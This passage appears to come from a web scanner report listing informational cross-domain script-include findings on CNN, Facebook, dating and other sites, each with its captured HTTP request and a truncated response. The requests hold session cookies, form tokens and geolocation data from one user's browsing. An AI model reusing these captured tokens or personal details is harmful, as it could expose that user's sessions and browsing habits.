<meta http-equiv="Conten
...[SNIP]...
<link href="/library/column/2011/07/08/C30796/base.css" rel="stylesheet" type="text/css" />

<script type="text/javascript" src="http://www.cctv.com/Library/homepage2008/20081114/script/top_111701.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.cctv.com/Library/a2.js"></script>
...[SNIP]...

14.21. http://ipr.cntv.cn/english/no1/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipr.cntv.cn
Path:   /english/no1/index.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /english/no1/index.shtml HTTP/1.1
Host: ipr.cntv.cn
Proxy-Connection: keep-alive
Referer: http://www.ipraction.cn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
X-UA-Compatible: IE=EmulateIE7
Content-Length: 2613
Content-Type: text/html
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:39:38 GMT
Date: Mon, 15 Aug 2011 18:37:38 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link href="/library/column/2011/07/08/C30796/base.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://www.cctv.com/Library/homepage2008/20081114/script/top_111701.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.cctv.com/Library/a2.js"></script>
<script type="text/javascript" src="http://www.cctv.com/Library/homepage2008/20081114/script/top_111701.js"></script>
<script type="text/javascript" src="http://www.cctv.com/Library/a2.js"></script>
...[SNIP]...

14.22. http://medleyads.com/spot/5022.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot/5022.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spot/5022.html?SEX=&WANT_TO_MEET=&LOCATION=&AGE=&SMOKING= HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/p/memsearch.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; group_history=2752=1; s1082=6308=1; __utmb=251326874.0.10.1313434615; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:36 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
P3P: CP="DSP LAW"
Vary: Accept-Encoding
X-ApacheServer: ii70-18.friendfinderinc.com
Content-Length: 1027
Content-Type: text/html


<html>
<head>
</head>
<body><div style="text-align:center; vertical-align:middle;">
<script type="text/javascript"><!--
google_ad_client = "pub-1644008520393294";
/* FF:Search Results Top Leaderbo
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

14.23. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/video/5.1/players/story.player.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /.element/ssi/video/5.1/players/story.player.html?p=0&d=72576981 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:58 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 1710

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>CNNMoney video player</title>
<!--[if LT IE 7]>
<link rel="stylesheet" type="text/css" href="http://i.cdn.tur
...[SNIP]...
<link rel="stylesheet" href="http://i.cdn.turner.com/money/.element/ssi/css/5.0/video/video.player.css" type="text/css" />

<script type="text/javascript" src="http://z.cdn.turner.com/money/.element/script/jquery/1.5.2/jquery.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.main/876.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://i.cdn.turner.com/xslo/cvp/ads/freewheel/js/fwjslib_1.1.js?version=1.1"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/4.0/video/common/cvp.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.story.player/935.js"></script>
...[SNIP]...

14.24. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /2011/08/15/markets/markets_newyork/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:50 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:16 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 63285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Market Report - Aug. 15
...[SNIP]...
<link rel="stylesheet" href="http://z.cdn.turner.com/money/.e/ssi/css/2.0/pkg/cnnmoney.story/1414.css" type="text/css" />


<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.main/876.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/jquery/1.5.1/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
<div id="cnnHeader" class="moneyMarketsNav"><script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/2.0/bankrate.js"></script>
...[SNIP]...
</div>
<script language="JavaScript" src="http://z.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js?20110803"></script>
...[SNIP]...
</script>

   <script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2435"></script>
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.story/1026.js"></script>
...[SNIP]...

14.25. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /2011/08/15/technology/google_motorola/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:30 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:00 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 45778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Google to buy Motorola
...[SNIP]...
<link rel="stylesheet" href="http://z.cdn.turner.com/money/.e/ssi/css/2.0/pkg/cnnmoney.story/1414.css" type="text/css" />


<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.main/876.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/jquery/1.5.1/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
<div id="cnnHeader" class="moneyTechNav"><script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
...[SNIP]...
</div>
<script language="JavaScript" src="http://z.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js?20110803"></script>
...[SNIP]...
</script>

   <script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2435"></script>
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.story/1026.js"></script>
...[SNIP]...

14.26. http://news.soso.com/n.q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.soso.com
Path:   /n.q

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /n.q?w=xss&pid=n.res.time.m&ty=c&sd=3&st=r HTTP/1.1
Host: news.soso.com
Proxy-Connection: keep-alive
Referer: http://news.soso.com/n.q?cf=web&ch=web.cf.news&pid=web.cf&ie=utf-8&w=xss&sd=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_flv=10.3 r183; ip=0; cookie=0; name=12612374529663113019270038729854; querytext=xss; pid=web.cf; pgv_pvid=9085923014; pgv_info=pgvReferrer=&ssid=s8020529487; __utma=169109310.1703238222.1313432881.1313432881.1313432881.1; __utmb=169109310.1.10.1313432881; __utmc=169109310; __utmz=169109310.1313432881.1.1.utmcsr=soso.com|utmccn=(referral)|utmcmd=referral|utmcct=/q

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:35:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: max-age=0
Expires: Mon, 15 Aug 2011 18:35:18 GMT
Vary: Accept-Encoding
Content-Length: 24733

<!DOCTYPE HTML>
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=gb2312" />
       <meta http-equiv="X-UA-Compatible" content="IE=7" />
       <title>xss - ........</title>
       <
...[SNIP]...
</script>
<script type="text/javascript" src="http://pingjs.qq.com/ping.js"></script>
...[SNIP]...

14.27. http://pop6.com/p/memsearch.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /p/memsearch.cgi HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
Content-Length: 281
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:35 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,9tCSyhGmD_RyWOBWStVf6Xu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii70-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75888
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<HTML>


<script type="text/javascript" src="http://graphics.friendfinder.com/javascript/live/ff-domLoadEvent-1284506173.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://graphics.friendfinder.com/javascript/live/ff-ajax_attach-1284506173.js"></script>
...[SNIP]...
<div id="supercontainer">

<script type="text/javascript" src="http://graphics.friendfinder.com/javascript/live/ff-prototype-1284506170.js"></script>
<script type="text/javascript" src="http://graphics.friendfinder.com/javascript/live/ff-searchinteractionsajax-1287094093.js"></script>
<script language="JavaScript" src="http://graphics.friendfinder.com/images/spell/spellChecker.js"></script>
<script type=text/javascript src="http://graphics.friendfinder.com/images/js/AjaxRequest-compact.js"></script>

<script type="text/javascript" src="http://graphics.friendfinder.com/javascript/live/ff-utility-1293480241.js"></script>
...[SNIP]...
</script>


<script type='text/javascript' src='http://graphics.friendfinder.com/common/js/linkUpdater_43.js'></script>
...[SNIP]...
</script>


<SCRIPT src="http://graphics.friendfinder.com/images/common/js/json2.js"></SCRIPT>
<SCRIPT src="http://graphics.friendfinder.com/images/common/js/madjax.js"></SCRIPT>
...[SNIP]...
</font><script src=http://graphics.friendfinder.com/css/live/ff/english/0/statedropdown_noxml-1311701905.js></script>
...[SNIP]...

14.28. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /people/Andr%C3%A9-Azevedo/1668500662

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /people/Andr%C3%A9-Azevedo/1668500662 HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
Content-Length: 998
Cache-Control: max-age=0
Origin: http://pt-br.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; act=1313433616787%2F1

post_form_id=208956c150919ab1cdeb13e59d929c7b&lsd=yxUAz&captcha_persist_data=AZn2Prk2YE02IBt6SralDuwZdXf9ZmW3h45Cn_PY4olwLPKhUXsCTDVn8L9HD-Vh3HuEMIvMMVmehaCRNynGK33nkkHNi9pP41mupKoNjo04_5AY6G12AqHHbwP
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.166.91
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:57 GMT
Content-Length: 72641

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt" xmlns:og="http://ogp.me/ns#" lang="pt" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/gjR314n9JTe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/7phT2ydMzW6.js"></script>
...[SNIP]...

14.29. http://static.xhamster.com/js/statcounter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.xhamster.com
Path:   /js/statcounter.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /js/statcounter.js HTTP/1.1
Host: static.xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; mdg:uid=940%3Aa5; prid=--; prib=--

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Mon, 15 Aug 2011 18:56:28 GMT
Content-Type: application/x-javascript
Content-Length: 980
Last-Modified: Fri, 20 May 2011 12:17:57 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Mon, 15 Aug 2011 19:26:28 GMT
Cache-Control: max-age=1800

var sc_project=6876336;
var sc_invisible=1;
var sc_security="2e908d63";
var sc_start = document.cookie.indexOf("sc_limit");
var sc_cookie_value = 0;
if (sc_start==-1) {
if (Math.floor(Math.r
...[SNIP]...
c_ex_date.setDate(sc_ex_date.getDate() + 365);
document.cookie = 'sc_limit='+sc_cookie_value+'; expires='+sc_ex_date.toUTCString()+'; path=/';
}
if (sc_cookie_value=="2") {
document.write("<script type='text/javascript' src='http://www.statcounter.com/counter/counter.js'></script>
...[SNIP]...

14.30. http://svcs.cnn.com/weather/getForecast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://svcs.cnn.com
Path:   /weather/getForecast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /weather/getForecast?time=46&mode=json_html&zipCode=31041&locCode=09GA&celcius=false&csiID=csi3 HTTP/1.1
Host: svcs.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:12 GMT
Server: Apache
Content-type: text/html
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=900
Expires: Mon, 15 Aug 2011 18:53:51 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 17092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head><script type="text/javascript">var cnnDocDomain=''; if(location.hostname.indexOf('cnn.com')>0) { cnnDocDomain='cnn.com'; }
...[SNIP]...
</script>
                   <script src="http://i.cdn.turner.com/cnn/.element/js/3.0/csi_include.js" type="text/javascript"></script>
...[SNIP]...

14.31. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tech.fortune.cnn.com
Path:   /2011/08/15/is-google-buying-motorola-for-its-17000-patents/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL HTTP/1.1
Host: tech.fortune.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; 